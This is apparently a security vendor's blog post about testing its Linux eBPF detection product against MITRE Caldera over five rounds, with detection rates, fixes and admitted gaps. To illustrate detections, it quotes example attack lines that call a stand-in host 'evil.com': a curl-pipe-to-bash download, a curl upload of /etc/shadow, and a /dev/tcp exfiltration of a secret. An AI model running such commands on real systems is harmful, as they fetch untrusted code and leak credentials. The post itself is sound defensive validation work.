Skip to content
Validation

We Ran MITRE Caldera Against Our Own Product. Here's What We Found.

14 min read

We have 65 MITRE ATT&CK technique IDs mapped in our detectors. That sounds impressive until you ask a simple question: do they actually work? Having a technique ID in your code is not the same as detecting that technique in practice. We needed to find out.

So we set up MITRE Caldera, pointed it at a VM running our full stack, and ran 5 rounds of testing over 2 days. Round 1 was humbling. By Round 5, we had a much better product. This is what happened.

What is MITRE Caldera

Caldera is an open-source adversary emulation framework built by MITRE. Version 5.3.0, the one we used, ships with hundreds of attack abilities mapped to ATT&CK techniques. You deploy a lightweight agent (called Sandcat) on a target machine, define an adversary profile with the techniques you want to test, and let it run. Caldera executes each technique, reports success or failure, and gives you a structured record of what happened.

It is not a penetration testing tool. It does not find vulnerabilities. It executes known attack behaviors so you can validate whether your detections actually fire. Think of it as unit tests for your security product, written by the people who maintain the ATT&CK framework.

Our test setup

We used a local Ubuntu 24.04 ARM64 VM running in UTM on a Mac. The VM had the full InnerWarden stack deployed: sensor with all 40 eBPF hooks active, the agent running AI triage, and all satellite services (killchain, shield, DNA). Real services were running too: nginx, PostgreSQL, SSH. This was not a clean-room test. It was a realistic production-like environment.

Test environment
Caldera server: Mac local, v5.3.0
Sandcat agent:  Ubuntu 24.04 ARM64 VM (UTM)
InnerWarden:    sensor + agent + killchain + shield + dna
eBPF hooks:     40 active (tracepoints, kprobes, LSM, XDP)
Real services:  nginx, postgresql, sshd
Adversary:      "InnerWarden Full Validation" (114 techniques)

The Caldera server ran on the Mac host. Sandcat, compiled for ARM64, ran on the VM as the attack agent. We created a custom adversary profile called "InnerWarden Full Validation" with 114 Linux-applicable ATT&CK techniques. One small patch was needed: disabling the internal IP check so the sensor would process events from the Mac's 192.168.x.x address. This patch was local only, never committed.

Round 1: 36% detection rate

The first run was rough. Out of the techniques Caldera successfully executed, we detected about 36%. The number was discouraging, but the reasons were illuminating.

The biggest issue was not missing detectors. We had the detectors. They just were not matching the events because of two problems we did not anticipate:

  • Event kind mismatches: our detectors expected events tagged as "process.exec" but the eBPF collector was emitting them as "process.start". Same data, different label. The detector never saw the event because it filtered by kind first.
  • argv truncation: our eBPF tracepoint for sys_enter_execve only captured argv[0], the binary name. When Caldera ran curl http://evil.com/payload | bash, we saw "curl" but not the URL. When it ran base64 -d payload.b64, we saw "base64" but not the arguments. Most of our detection logic depended on argument patterns, and we were throwing them away.
  • False positive noise: the sensor was generating so many low-quality alerts from normal system activity that real attack events were buried. Caldera's Sandcat agent itself triggered multiple false positives on every heartbeat.

The fix that changed everything: full argv capture

The argv truncation problem was the most impactful. Our eBPF tracepoint captured argv[0] from the execve arguments, but eBPF has strict limits on how much data you can read from user memory. Reading a variable-length argument list inside a BPF program is genuinely hard because of the verifier's bounds checking.

The solution was to skip the eBPF argument parsing entirely for the full command line. Instead, after the eBPF event fires in userspace, we read /proc/PID/cmdline to get the complete argument vector. The process is still alive at this point because we hook sys_enter_execve (the entry, not the exit). The /proc read happens in the sensor collector, not in the eBPF program, so there are no verifier constraints.

Before vs after
# Before: eBPF argv[0] only
event.argv = "curl"
# Detector for data exfil via curl: NO MATCH (no URL to inspect)

# After: full /proc/PID/cmdline
event.argv = "curl -s http://evil.com/c2 -d @/etc/shadow"
# Detector for data exfil via curl: MATCH (sees the URL + sensitive file)

This single change unlocked detection for dozens of techniques that depended on argument inspection: base64 obfuscation, curl/wget downloads, file exfiltration, reverse shell arguments, and crontab manipulation.

Rounds 2 through 5: progressive improvement

Each round revealed new categories of problems. We fixed them and re-ran.

Detection rate progression
Round 1: 36% detection

Baseline test. Exposed argv truncation, event kind mismatches, and massive false positive volume.

Round 2: event normalization fixes

Unified event kinds across collectors. Fixed mismatches between eBPF, journald, and auth.log event labels. Added full argv capture from /proc/PID/cmdline.

Round 3: false positive cleanup

15+ false positive fixes. Dynamic allowlists for known system processes. Tuned thresholds for network scanning detection. Sandcat heartbeats no longer triggered alerts.

Round 4: new detectors

Added detectors for T1485 (data destruction), T1552.004 (private key discovery), and T1560 (archive collected data). These techniques were executing successfully with zero coverage.

Round 5: full stack validation

Real services running (nginx, PostgreSQL). Network attacks included. Base64 obfuscated payloads. This was the closest to a real-world scenario.

Final result: 67% of testable techniques detected

After 5 rounds, we stabilized at 67% detection of testable techniques. "Testable" is an important qualifier. Not all 114 techniques in our adversary profile could be meaningfully evaluated:

  • Some techniques require kernel features we do not hook yet (specific kernel module loads, certain ioctl calls).
  • Some techniques need Windows-specific payloads that Caldera skipped on Linux.
  • Some techniques failed to execute on our ARM64 VM because the Caldera abilities assumed x86_64.

When we exclude techniques that either failed to execute or require fundamentally different kernel hooks, 67% of the remaining set triggered at least one InnerWarden alert. That is honest, not heroic. But it is validated.

Numbers
MITRE technique IDs mapped:      65
Caldera techniques in profile:   114
Techniques that executed:        ~85
Testable (within our hook scope): ~75
Detected:                        ~50
Detection rate (testable):       67%
Detection rate (all executed):   ~59%
Validated through Caldera:       40% of our 65 mapped IDs

The gap between "65 technique IDs mapped" and "40% validated through Caldera" tells you something important. Having a technique ID in a comment next to your detector function does not mean you detect that technique. Caldera proved that about 60% of our mapped techniques need either better event coverage, additional correlation, or entirely new detection logic to work in practice.

What we cannot detect yet

Transparency matters more than marketing. Here are the categories where InnerWarden has real gaps:

  • Pure shell builtins: commands like echo, printf, and read are shell builtins. They execute inside the bash process itself without calling execve. Our eBPF tracepoint on sys_enter_execve never fires. An attacker using only builtins to exfiltrate data (for example, echo $SECRET > /dev/tcp/evil.com/443) produces no execve event. The connect tracepoint might catch the outbound connection, but the command itself is invisible.
  • Memory-only attacks without execve: if an attacker exploits a running process (buffer overflow, ROP chain) and never calls execve, we see the process's existing PID but cannot attribute new behavior to an exploit. We catch the side effects (unexpected network connections, file access) but not the exploitation itself.
  • Kernel exploits: attacks that exploit kernel vulnerabilities to escalate privileges may bypass our kprobe on commit_creds if they modify credentials through a different code path. We detect most privilege escalation, but a sufficiently novel kernel exploit could evade it.
  • file.write_access coverage: our openat tracepoint captures file opens, but coverage for write-specific access patterns is incomplete. Some techniques that modify files (like crontab injection or .bashrc modification) are detected through the process that writes them, not through the file operation itself. If the writing process looks benign, we miss it.
  • Correlation-dependent techniques: some ATT&CK techniques are not a single event but a sequence. Lateral movement, for example, involves credential access followed by remote login followed by execution on a new host. Detecting these requires multi-event correlation across time windows. We have 30 correlation rules, but not all technique sequences are covered.

What we improved because of Caldera

The testing was not just about measuring detection rates. It drove concrete improvements:

Changes shipped
Full argv from /proc/PID/cmdline

Replaced eBPF-only argv[0] capture with userspace /proc read for complete command lines. Single biggest improvement to detection accuracy.

15+ false positive fixes

Dynamic allowlists for package managers, cron jobs, systemd units, and monitoring agents. Reduced alert noise by roughly 70% without losing real detections.

3 new detectors

T1485 (data destruction via rm, shred, wipe), T1552.004 (searching for private keys and certificates), T1560 (archiving collected data before exfiltration).

Event kind normalization

Unified event taxonomy across eBPF, journald, auth.log, and nginx collectors. Detectors now match consistently regardless of the event source.

Base64 obfuscation detection

With full argv, we now detect echo payload | base64 -d | bash patterns that were previously invisible.

The lesson: mapped is not detected

The most important takeaway from this exercise is something the security industry does not talk about enough. Every EDR vendor publishes a MITRE ATT&CK matrix with colored cells showing which techniques they cover. Those matrices are aspirational, not validated. Having a detector function tagged with a technique ID means someone wrote code that should, in theory, catch that technique. It does not mean the detector fires when the technique actually executes on a real system.

Between the technique definition and actual detection, there are dozens of failure points: event kind mismatches, argument truncation, false positive filtering that is too aggressive, missing event sources, correlation windows that are too narrow, and platform-specific behaviors that differ from what you tested in development.

We started with 65 technique IDs mapped in our codebase. Caldera validated about 40% of them. That does not mean the other 60% are broken. It means we have not proven they work yet. There is a difference, but only if you are willing to keep testing.

What is next

We plan to run Caldera continuously, not just as a one-time validation. Every new detector gets tested against the relevant Caldera ability before it ships. The goal is to move from 67% toward 85%+ on testable techniques, while being honest that some categories (kernel exploits, pure builtins) may never reach 100% without fundamentally different instrumentation.